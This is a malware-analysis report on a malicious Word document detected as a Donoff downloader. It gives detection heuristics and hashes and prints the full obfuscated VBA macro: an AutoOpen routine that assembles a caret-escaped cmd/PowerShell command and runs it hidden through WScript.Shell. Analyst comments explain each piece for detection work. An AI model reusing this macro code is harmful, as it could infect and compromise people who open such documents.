Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02e2263411dafea2…

MALICIOUS

Office (OLE)

76.6 KB Created: 2018-08-23 17:43:00 Authoring application: Microsoft Office Word First seen: 2018-08-26
MD5: 0c1b171c15d87034decb9870d098c50b SHA-1: d5457d12dc303aa2396ce1d8a6092a1ac77c9299 SHA-256: 02e2263411dafea25935be069c1b2b41e07facab08797da2fc985f509bbda46a
310 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Donoff-6665649-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6665649-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       Error 97883 * jMlrb / ZNqYDz * 72059
    dcbwp = CreateObject("WScript.Shell") _
    . _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Error 97883 * jMlrb / ZNqYDz * 72059
    dcbwp = CreateObject("WScript.Shell") _
    . _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "oasizwwuo"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9675 bytes
SHA-256: 9ac5afc5b078c465cc44c29c11e514d6a28cc421f0ecd6b1528cec54d0a8e324
Detection
ClamAV: No threats found
Obfuscation or payload: likely
113 of 195 identifiers look randomly generated (e.g. 'fOiZBLwQRFa'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LUEBuKp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ciccFjHQiQ"
' Analyst note: builds the first fragment of the obfuscated command string that
' AutoOpen later passes to WScript.Shell.Run. Its only observable output is the
' return value assigned near the end: the ordered join of twelve string chains.
'
' The scattered "Error n * name" statements reference identifiers that are never
' assigned and never feed the returned string. Any run-time error they raise is
' swallowed by On Error Resume Next, so they appear to be junk padding whose
' purpose is to defeat signature matching and inflate the source (the report's
' obfuscation finding counts 113 of 195 identifiers as randomly generated).
Function cjjLKEJkzVX()
On Error Resume Next
Error 38487 * MJpwpF
   Error lVvchP / hLALdC
   Error 44240 * TjBQXa * 90183 / RIrEz
   Error 38222 * SjlMUD
' Chr(5 + 4 + 2 + 3 + 20) evaluates to Chr(34), a double quote. The "^" characters
' inside the fragments are presumably cmd.exe escape characters that the command
' interpreter strips, which hides tokens such as "SET" (here "^S^E" + "^t") from
' plain-text scanning; the leading "md  /V" is completed to "cmd" by the "C"
' that AutoOpen prepends.
HUCit = "md  /V" + "^ ^ ^ /" + "c    " + Chr(5 + 4 + 2 + 3 + 20) + "  " + "^S^E" + "^t ^KM^" + "9^P==" + "AA^IA" + "A" + "CAgAAI^" + "A^AC" + "^Ag"
Error CMODY / fuJQd
   Error 64335 * dIIYl / 27741 * hQFuJA
jPCWPORj = "A^AIAA" + "C^" + "A^g^A" + "AI" + "^AACA^g" + "^A^" + "AIA"
Error 79574 / hJGzN / 97196 * HJzrS
   Error zpvEAr / jTAHLu * 32415 / lYLDG
mKSXultAE = "^AC^" + "A^gA^" + "A^" + "I^AACA" + "^9^BQ" + "f^As^H^"
Error 8926 / FJWtNv * 25308 / OjYsS
LdBZQDo = "AoB^" + "wY^AQ" + "HA^hB^w" + "^YA^0" + "H^A" + "^7" + "^Aw^aA" + "^EG^" + "AlBgc" + "^AI^G" + "^A7^A"
Error vuthh * szNDw
   Error 29252 / 16173
   Error 73656 / LwzEv
DzvHh = "w^d^A^8" + "^EAV^B" + "^AJ^" + "A^" + "AC^AtBQ" + "^ZAQHAJ" + "^B^Q" + "L^AU" + "^G" + "^Ar^" + "B^w^b"
Error LcohV * zGQomX / 14107 * jKMZc
   Error wiiZPo / RcKok
   Error 95665 / DHwDp * 92883 * oGBKFm
oNVOjtowI = "^AY^" + "HAu" + "B" + "QSAsD" + "^A^p^A" + "^wd^" + "A^8" + "^" + "E^AV^" + "BA^J^A" + "AC^A" + "^s"
Error 27910 * owpSpn / hEhRzP / KHAZj
   Error 34788 / Dfchk
WqBzrsN = "A" + "g^U" + "^A^UE" + "^" + "A^1B^A" + "^J^A^" + "gCAl^B" + "^AbA^k" + "GA" + "^G^B" + "A" + "^ZA" + "^"
Error 30968 * uztoC
VkEmHScm = "E^G^Av^" + "B" + "^A^b" + "A4^G^A" + "3^B^w^" + "b^A" + "Q^E" + "^Au^" + "AgaAcFA" + "WB" + "^AJ^A" + "^s^H"
Error UFVkO / 18343 * 82338 / sAwmvj
   Error oWlrr / DdSLU
   Error vmrUYs / fjXwRJ
   Error 26073 * sJpICi / oTWzVU / zHMMf
   Error 14895 * wCERa
VzTwwuIkU = "A^5^B" + "^gc" + "^A" + "^" + "QHA7"
Error RLRcL / LfpMw
OiMwzQojhi = "^" + "B^QKA^Y" + "^FA" + "^wBQ" + "cA^Q" + "CAg^Ag^" + "bAk" + "G^AgAg^" + "U^AUE" + "A1^B^A" + "^J^A" + "gC^Ao" + "^BwY"
Error uEGat / uWTUEw
   Error VOwFKw * GJMkub
KzlVTVsBl = "^" + "AEG" + "AlB^gc" + "A8^G^" + "A^m^Bw^" + "OAcC" + "^A^l^B"
Error twacc * KiKEKu * zYMQXJ / OsrGTo
   Error 88646 * wIirHa
BuwEDjhdw = "^A" + "^e^AUG" + "AuA^" + "w^" + "JAsC^A"
' Return value: the fragments in declaration order. Nothing else escapes the function.
cjjLKEJkzVX = HUCit + jPCWPORj + mKSXultAE + LdBZQDo + DzvHh + oNVOjtowI + WqBzrsN + VkEmHScm + VzTwwuIkU + OiMwzQojhi + KzlVTVsBl + BuwEDjhdw
   Error 13969 * 23097
   Error 8184 * vGntO
End Function
' Analyst note: second fragment of the command string assembled in AutoOpen
' (it follows cjjLKEJkzVX in the concatenation there). Same construction as the
' other fragment functions: nine caret-laced string chains are joined into the
' return value, and the interleaved "Error ..." statements use identifiers that
' are never assigned, so they contribute nothing to the result and are neutralised
' by On Error Resume Next.
Function IuUfVPSznl()
On Error Resume Next
Error iEBEz * FUJnw
   Error 85639 / wcDkW
WOAazkccTPw = "^" + "T" + "^" + "B^g^e" + "^A" + "o^F"
Error LiWwz * SaajFS
   Error jmKZB * 5963 / 96585 * dnXjK
dCiPmUoq = "^Ak^A" + "^wKAc" + "CAc^B" + "^wJ" + "^A" + "sCAjB^Q" + "^a^A" + "^wG^"
Error 57581 / XiUtTh
   Error thjzKM * MVjAP / 23617 / dwrRP
   Error VCiMO * arsvQ * wOmLm / ibOaG
cjoNIHpHBip = "A" + "iB" + "Qd^A^AH" + "A" + "^6^A"
Error 85891 / wJGPw
   Error 80228 / vwPUcq * hjLMbh / wapFiW
ONfbEizZ = "^gd^A^" + "4^G^Al" + "B^A^" + "J^" + "A0" + "^D^A^" + "3^B^w^T" + "A^UF" + "A^k^A^" + "wO^"
Error 24002 / 85235
GLZSIfNLa = "Ac" + "CA^" + "y^A" + "wN" + "AEDAnA" + "A^I" + "A0DA^g" + "A^" + "wUA" + "^o^H" + "^Aa" + "B^AJA^s"
Error 75145 / DzHpfm * 9744 * wuAGA
   Error TEDBd / EXvvji
   Error MrRbLN * ZssTlE
   Error 91579 * YVYJz
PLIGOouoWX = "^D^Ap^A" + "w^JA^A" + "^EAnA" + "AK" + "A^QHAp^" + "B" + "^Ab" + "A^A" + "^HA^T"
Error bdXYOz * 23719
JPwFA = "Bg^" + "L^AcC" + "ASB^QW^" + "AY^" + "GArBwS^" + "A^8C" + "^AtB^w^" + "bA^M^G" + "Au^A^wc" + "A^" + "U^GA^p^"
Error 60585 * avCzF
   Error UVfii / dmTzN * mWjHbX / 12837
cBvQpsC = "B^gcA^" + "kH^" + "Ar^" + "Bwc^A^4" + "CA^kBg"
Error 49380 * vjzDUK
   Error SOrjO * wuUub / OnFtCr * abziSu
   Error 70125 / 97601
   Error 98350 / cwauj * qVridm * OwUIb
FNZQQwclk = "b^A8^" + "GA^wB^" + "w" + "cA" + "I^H^Al^" + "B^A^Z" + "^A4^G" + "A" + "1^B^wb^"
' Return value: the nine fragments above in order.
IuUfVPSznl = WOAazkccTPw + dCiPmUoq + cjoNIHpHBip + ONfbEizZ + GLZSIfNLa + PLIGOouoWX + JPwFA + cBvQpsC + FNZQQwclk
   Error WuvTjY / bjwLVl
   Error 60563 * tYwMWw
   Error MPEwSc / dwfFD / 59807 / AWFtKj
End Function
' Analyst note: third fragment of the command string assembled in AutoOpen.
' Eight caret-laced string chains are joined into the return value; the
' "Error ..." statements between them reference unassigned identifiers, do not
' touch the result, and are silenced by On Error Resume Next (junk padding).
Function fOiZBLwQRFa()
On Error Resume Next
Error 63205 / QjPCH
   Error ZwzGQ * mJEai
   Error tcISY * HclPjv / pilMVV / 17973
JMpYwrMCrj = "A^Y^GA" + "v^A^w" + "L^A^" + "o" + "D^A^w^" + "BA^dAQ^"
Error 8854 / TjCSkG
wzcORwoOSWO = "H" + "^A^" + "o^BAQ" + "^AgHAW^" + "BQN^A" + "^4^"
Error 89251 / VoXwif
   Error ojRLhi / XrFNN
   Error XbzoZ * 78579 * fJwAIU / NQqqcu
   Error 41406 / HCXOM
KNGkGFdGjn = "G^ANBQa" + "AI^HAC" + "B^wL^A0" + "GAv^BwY" + "^A4C" + "A^4" + "^B^" + "QdA^" + "Q" + "H^A^o"
Error 40878 * tHQwzq / smIZT * ZJKJb
   Error 44046 * nWCLrm
TLrss = "^Bw^" + "ZA^kGA" + "^s^" + "Bg" + "L^A" + "^k" + "H^"
Error QJcUON / RSAljI
   Error wwcODC * mwvGkO
   Error 10767 / DRGsQ * 81244 / KvhsIN
   Error 4069 / nFOuJn
RcLDKfY = "A^kBg^" + "b^AUG^" + "A" + "mBwLA8C" + "A6^" + "A^" + "Ac^A^Q" + "H^A0" + "^BAa^" + "AA"
Error XiZIcO / NwhRBp
   Error 12857 * 12245 * SWKfY * sbzIW
vCFColvD = "E^A" + "zA^w^Q" + "A^kE" + "^ATBAM" + "^A8C" + "Ar" + "^BA" + "^d^A^" + "4" + "C^" + "AsB" + "^QY^"
Error 29553 * iQtLRC
   Error MvQEk * zaHorV
QpCdsVCaiW = "A^" + "kGA" + "^y^B^" + "wbAQHA1" + "BA" + "d^" + "Ac^G^A" + "v^B^A" + "^b^A"
Error 93933 / SjhfFJ
skuhvZF = "^IGA^" + "zB^Q^a" + "A" + "^gGAl^B" + "^" + "w^L^A" + "8CA6" + "^AAcA" + "^QH^A" + "^" + "0BA" + "^a^A^A" + "E^"
' Return value: the eight fragments above in order.
fOiZBLwQRFa = JMpYwrMCrj + wzcORwoOSWO + KNGkGFdGjn + TLrss + RcLDKfY + vCFColvD + QpCdsVCaiW + skuhvZF
   Error XXYmu / PwDzkH * 16058 / 16638
   Error 98994 * OWCttL
   Error tlVnNC * OlNFYn
End Function
' Analyst note: fourth fragment of the command string assembled in AutoOpen.
' Six caret-laced string chains are joined into the return value. As in the
' sibling fragment functions, the "Error ..." statements operate on identifiers
' that are never assigned and are masked by On Error Resume Next, so they have
' no effect on what the function returns.
Function tMRmwQX()
On Error Resume Next
Error WzUMrJ * jfWvf / 99332 * dLFrB
pZBnJ = "A" + "v^BA^" + "e^A^" + "g^H^Ar" + "^BAR^A8" + "CA1^" + "B" + "^gc^" + "A^" + "4" + "CAh^Bgb" + "^A" + "k^GAn"
Error 25065 / tTvLvh
   Error pursW * sauBXa / wqHCj * mIqHM
VQLEvN = "BQYA^g" + "^GA" + "j^B^" + "gc^A8^G" + "Ar^BQ" + "LAIHAv" + "^BA^dAM" + "^G^Av" + "^BA^Z"
Error 97269 * zqbsL
   Error Vwncq / ctIZB / VzpRpI * znidJ
   Error lEwlv * 5548
qOICJ = "A^4CA0^" + "B^gb" + "AU^G^A" + "k^B^" + "w^LA^" + "8CA6AAc" + "^" + "A^QH" + "A^" + "0B^A^aA" + "A^EAR"
Error swcCh / 62766 / sELkUD / 25261
   Error 7873 / LCYVGu / ZIImq * 40576
   Error 22334 * JVKTK / 41871 / CMJXO
   Error 70853 / anwIa / svVSCf / vjTVCE
kqtEfUhh = "B" + "Q^" + "U^A^s^E" + "AkB" + "^wQ" + "A^" + "8C" + "A^t^B" + "w"
Error zMDicw / aWVSG
   Error 38273 / TCNYB
   Error 60128 * SNkHM * 26314 / MaQBAi
   Error 3161 * Jvhzs
   Error PiBoN * 71018
rzlHcPjwhIV = "bA^" + "MGAuA^" + "Q^" + "Z^AIH" + "ArB" + "^gcA^kG" + "At" + "B" + "^g^L^" + "Ac^H" + "^A^sB" + "^wL^A^" + "8C^A"
Error ZEzIu * vBNhCw / EfjOSz * EZDoTQ
   Error ILnNl * HuELlz
   Error shHTMw * 55923 * 16418 / sSSHHw
TPijz = "^6A" + "^AcAQH" + "A" + "^0B^A^a" + "^AcC" + "A9A^gV" + "^A" + "^A^H" + "AxBA^J"
' Return value: the six fragments above in order.
tMRmwQX = pZBnJ + VQLEvN + qOICJ + kqtEfUhh + rzlHcPjwhIV + TPijz
   Error Jfaik * bXIVz
   Error 77199 * COVwTA * 51495 * zBJod
   Error 59035 * bzifWl
End Function
' Analyst note: fifth and last fragment of the command string assembled in
' AutoOpen. Unlike the earlier fragments, which are mostly encoded blob text,
' several chains here contain what look like caret-split batch keywords
' ("^F^OR /^L", "Se^T", "Ca^l^l", "%xF:...=%") and a run of reversed letters
' ("^ll^e" + "hsr^e" ...), consistent with a second stage that rebuilds and
' decodes the blob inside cmd.exe — to be confirmed by decoding the full string.
' The "Error ..." statements follow the same junk-padding pattern as the other
' fragment functions and are masked by On Error Resume Next.
Function wiKYiYFqw()
On Error Resume Next
Error 70472 * TlidHS
qRGFGf = "AsD^A0" + "^" + "Bgb^" + "AU^G" + "^A^p" + "BA^b" + "AM" + "E^Ai"
Error fJHJj * 72647
   Error 45306 / wSfbDt * 53598 * MbTTwS
   Error 73628 / wRzQq * 33252 / JfzIS
oUPSfzLEw = "BQZ" + "^AcF" + "A^u" + "^AA^d" + "^A^" + "U" + "GAO" + "BA" + "^" + "I^A^Q" + "HA^jBQ"
Error 30291 / XtMFb
   Error qWBfG * wLqZwo * KMBNO / kbzwak
   Error 55128 * hKJUA * 80067 / EDnuj
   Error OJBtM * WivPn
   Error 51611 * KIJQS / 30556 / chfABb
wNnMYDK = "^" + "ZAoG^A" + "i^B^w^" + "b^" + "A^0C^A3"
Error 57432 / umnGY
   Error UYMXfT / iBfwdd
   Error 76413 * OAfiMl
   Error 90737 / VKhcYS / 20051 * ZBYsT
   Error FusJc * BCAzta
lWJXp = "^B^Q" + "ZA4^G^A" + "^9" + "Aga" + "AcFA" + "^WBAJ" + "^ e" + "^-^ " + "^ll^e" + "hsr^e" + "^" + "w^"
Error 27823 / PZujf
   Error IoJZC / PsXjUf / 26510 * zCqDj
   Error 68029 * RXiir / QfunK / IJPHFJ
   Error 70168 / ZCRcZ / LkuoTH * qiDDd
   Error mkiHW * oQZZlX / zJdXv * wluNzm
   Error phqhR / SRjUv
ANFSppJQ = "o" + "^p&  ^F" + "^OR " + "/^L %^" + "M ^IN (" + " ^" + " "
Error 58585 / jlKqbi
rfWBvrESt = "1" + "^0^0" + "^1^ ^  " + "^" + ",    " + "-1^  " + "  ,^ ^" + " 0 )" + "D^" + "o   " + " Se" + "^T   xF"
Error NQBdm / 75089
   Error 42437 / 77703
   Error 55451 / NQdNJj * 25321 / YINSiV
   Error 71037 / 236
   Error 10141 / nrnnN * 33755 * 77359
hcljsIIH = "=" + "!xF!!^" + "KM^9^" + "P" + ":~%^" + "M, " + "  1!&&" + " " + "i^F  " + "%"
Error jJhCp / wczsc / 49045 / wALit
   Error 73917 / nVoZK / qZatU * oZjiKc
   Error 36537 / KWVQG * 79654 / RRoqzI
zjNjXzDI = "^M ^Ls" + "^" + "S ^1 " + "C" + "a^" + "l" + "^l" + "  " + "%xF:^*^" + "x" + "^F^!^" + "=%   " + " "
Error itEYlD * biKVWw
   Error 58914 / mknPNb * QviqYY * QcdcnT
   Error wpNUGd * EMpfzi
' Chr(5 + 4 + 2 + 3 + 20) is Chr(34), a double quote: this closes the quoted
' section that cjjLKEJkzVX opened right after "/c".
KXOVOj = "   " + Chr(5 + 4 + 2 + 3 + 20) + ""
' Return value: the nine fragments above in order.
wiKYiYFqw = qRGFGf + oUPSfzLEw + wNnMYDK + lWJXp + ANFSppJQ + rfWBvrESt + hcljsIIH + zjNjXzDI + KXOVOj
   Error RUHwZb * TjQYDT
End Function


Attribute VB_Name = "oasizwwuo"
' Analyst note: AutoOpen is a Word auto-execution entry point, so this procedure
' runs as soon as the document is opened with macros enabled (flagged in the
' report as OLE_VBA_AUTOOPEN). It is the only procedure in the extraction that
' performs an action; everything else just returns string fragments.
Sub AutoOpen()
On Error Resume Next
   Error 46481 / 26051
   Error Ivjstq * 77205
   Error 97883 * jMlrb / ZNqYDz * 72059
' The WScript.Shell object and its Run method are split across line
' continuations ("_") so that "WScript.Shell" and "Run" never share a line.
' ChrW(0 + 3 + 0 + 7 + 57) is ChrW(67) = "C", which completes the "md  /V ..."
' fragment from cjjLKEJkzVX into "cmd". TaMJZCCo, UqTHRnjf, uOdFjcd and bvLijHZ
' are not defined anywhere in the visible extraction — presumably Empty Variants
' that add nothing, unless they live in a module the preview does not show.
' The second Run argument, 887574870 - 887574870, is 0: the hidden-window style.
' Detection opportunity: a Word process spawning cmd.exe with a long "/V ... /c"
' command line whose tokens are broken up with "^" escape characters.
dcbwp = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(0 + 3 + 0 + 7 + 57) + TaMJZCCo + UqTHRnjf + cjjLKEJkzVX + IuUfVPSznl + fOiZBLwQRFa + tMRmwQX + wiKYiYFqw + uOdFjcd + bvLijHZ, 887574870 - 887574870)
   Error QWALs / USccaF / 19049 * AAMEw
End Sub